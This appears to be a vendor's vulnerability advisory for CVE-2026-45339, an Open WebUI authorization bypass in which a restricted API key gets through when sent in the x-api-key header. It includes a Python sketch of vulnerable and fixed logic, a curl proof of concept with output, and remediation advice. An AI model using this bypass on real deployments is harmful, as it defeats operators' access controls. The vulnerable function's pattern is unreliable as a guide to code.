CVE-2026-45339

CVE-2026-45339 is a medium-severity incorrect authorization vulnerability in open-webu (pip), affecting versions <= 0.8.12. It is fixed in 0.9.0.

Summary

Open WebUI allows admins to restrict which API endpoints an API key can access. When an API key is restricted from /api/v1/messages, requests using the Authorization: Bearer sk-... header are correctly blocked with 403. However, the same key sent via the x-api-key header bypasses the restriction entirely: the request is authenticated, the model is invoked, and a full response is returned.

Details

Open WebUI's Anthropic-compatible API path accepts authentication via x-api-key header (standard for the Anthropic API). The endpoint restriction check only applies to keys presented via the Authorization header. When the same sk-... key is supplied in x-api-key, the restriction check is skipped but the key is still valid for authentication.

This means any API key, regardless of its configured endpoint restrictions, can access any API endpoint by simply using x-api-key instead of Authorization.
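The following is an added illustration of the bug class described above, written for this page; it is not Open WebUI's code, and the names (ApiKey, KEYS, authorize_vulnerable, authorize_fixed, the denied_endpoints restriction model and the sample key) are assumptions. It shows why the endpoint restriction has to be enforced on the resolved key, at one point, regardless of which header carried the credential, and it doubles as the regression check an operator would want after upgrading.

```python
"""
Illustration only (not Open WebUI's implementation): endpoint restrictions
enforced per-header versus on the resolved credential.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ApiKey:
    """Hypothetical key record: owner plus the endpoints the key may NOT call."""
    user: str
    denied_endpoints: frozenset


# Constructed sample key store for the example; a real store would hold
# hashed keys, not plaintext.
KEYS = {
    "sk-example-key": ApiKey(
        user="alice", denied_endpoints=frozenset({"/api/v1/messages"})
    ),
}


def _headers_ci(headers):
    """HTTP header names are case-insensitive; normalise before lookup."""
    return {k.lower(): v for k, v in headers.items()}


def bearer_key(headers):
    """Extract an sk-... key from 'Authorization: Bearer <key>', else None."""
    value = _headers_ci(headers).get("authorization", "")
    scheme, _, token = value.partition(" ")
    if scheme.lower() == "bearer" and token:
        return token.strip()
    return None


def x_api_key(headers):
    """Extract the key from the Anthropic-style 'x-api-key' header, else None."""
    value = _headers_ci(headers).get("x-api-key", "")
    return value.strip() or None


def authorize_vulnerable(headers, path):
    """
    Mirrors the defect the advisory describes: the endpoint restriction is
    consulted only on the Authorization path. The x-api-key path authenticates
    the same key without ever reaching the restriction check.
    Returns (status_code, detail).
    """
    token = bearer_key(headers)
    if token:
        key = KEYS.get(token)
        if key is None:
            return 401, "Invalid API key."
        if path in key.denied_endpoints:
            return 403, "API key not allowed to access this endpoint."
        return 200, key.user

    token = x_api_key(headers)
    if token:
        key = KEYS.get(token)
        if key is None:
            return 401, "Invalid API key."
        return 200, key.user  # BUG: denied_endpoints never checked here

    return 401, "Missing credentials."


def authorize_fixed(headers, path):
    """
    Hardened form: first resolve the credential from any accepted header,
    then apply authentication and the endpoint restriction at a single point
    so every transport of the key is treated identically.
    Returns (status_code, detail).
    """
    token = bearer_key(headers) or x_api_key(headers)
    if not token:
        return 401, "Missing credentials."
    key = KEYS.get(token)
    if key is None:
        return 401, "Invalid API key."
    if path in key.denied_endpoints:
        return 403, "API key not allowed to access this endpoint."
    return 200, key.user


if __name__ == "__main__":
    for name, fn in (("vulnerable", authorize_vulnerable), ("fixed", authorize_fixed)):
        for hdrs in ({"Authorization": "Bearer sk-example-key"},
                     {"x-api-key": "sk-example-key"}):
            print(name, list(hdrs)[0], fn(hdrs, "/api/v1/messages"))
```

The vulnerable function returns 403 for the Authorization header and 200 for x-api-key with the same key, reproducing the page's observed behaviour; the fixed function returns 403 for both and still allows the key on endpoints it is not restricted from. The structural lesson is that authentication and authorization should not be split per credential transport: each new way of presenting the same credential is a new path that must reach the same policy check, and a regression test that sends the same key through every accepted header is the cheapest way to keep it that way.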

PoC

Verified against Open WebUI v0.8.11.

Setup: Admin creates a user with an API key that has endpoint restrictions (not allowed on /api/v1/messages). A mock OpenAI-compatible model (mock-model) is configured.

API_KEY="sk-dc56016d720e49ba9e95584d602b79bb"

# Test 1: Authorization header, BLOCKED (endpoint restriction enforced)
curl -s -X POST http://target:8080/api/v1/messages \
  -H "Authorization: Bearer $API_KEY" \
  -H 'Content-Type: application/json' \
  -d '{"model":"mock-model","messages":[{"role":"user","content":"via Authorization header"}]}'

# Test 2: x-api-key header, BYPASS (same key, restriction skipped)
curl -s -X POST http://target:8080/api/v1/messages \
  -H "x-api-key: $API_KEY" \
  -H 'Content-Type: application/json' \
  -d '{"model":"mock-model","messages":[{"role":"user","content":"via x-api-key header"}]}'

Verified output:

# Authorization header:
{"detail":"API key not allowed to access this endpoint."}

# x-api-key header (SAME key):
{"id":"chatcmpl-mock","type":"message","role":"assistant","content":[{"type":"text","text":"MOCK-CHAT-RESPONSE"}],"model":"mock-model","usage":{"input_tokens":1,"output_tokens":1}}

The same API key is rejected via Authorization (403) but fully processed via x-api-key (200 with model response).

Impact

Any API key with endpoint restrictions can bypass those restrictions by using the x-api-key header instead of Authorization. This undermines the entire API key permission model:

  • Keys restricted from chat/completion endpoints can still send messages and receive LLM responses
  • Keys restricted from admin endpoints may access admin functionality
  • The operator's intended access control is silently ineffective
  • API credit spend cannot be controlled through endpoint restrictions

The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions. Typical impact: unauthorized data access or execution of privileged operations.

CVE-2026-45339 has a CVSS score of 6.5 (Medium). The vector is network-based, requires high privileges, and needs no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.9.0); upgrading removes the vulnerable code path.

Affected versions

open-webu (<= 0.8.12)

Security releases

open-webu → 0.9.0 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade open-webu to 0.9.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-45339? CVE-2026-45339 is a medium-severity incorrect authorization vulnerability in open-webu (pip), affecting versions <= 0.8.12. It is fixed in 0.9.0. The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions.
  2. How severe is CVE-2026-45339? CVE-2026-45339 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of open-webu are affected by CVE-2026-45339? open-webu (pip) versions <= 0.8.12 are affected.
  4. Is there a fix for CVE-2026-45339? Yes. CVE-2026-45339 is fixed in 0.9.0. Upgrade to this version or later.
  5. Is CVE-2026-45339 exploitable, and should I be worried? Whether CVE-2026-45339 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-45339 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-45339? Upgrade open-webu to 0.9.0 or later.
